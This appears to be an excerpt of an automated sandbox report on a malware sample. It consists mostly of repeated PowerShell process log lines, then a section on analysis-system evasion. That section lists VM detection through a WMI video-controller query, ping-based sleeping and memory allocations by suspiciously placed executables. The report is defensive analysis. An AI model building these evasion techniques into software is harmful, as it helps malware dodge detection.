Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files\Windows NT\smss.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Memory allocated: 1A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Memory allocated: 1B420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Memory allocated: 8C0000 memory reserve \| memory write watch
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Memory allocated: 1A530000 memory reserve \| memory write watch
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Memory allocated: F40000 memory reserve \| memory write watch
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Memory allocated: C70000 memory reserve \| memory write watch
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Memory allocated: 1A6D0000 memory reserve \| memory write watch
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Memory allocated: 1110000 memory reserve \| memory write watch
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Memory allocated: 1AB10000 memory reserve \| memory write watch
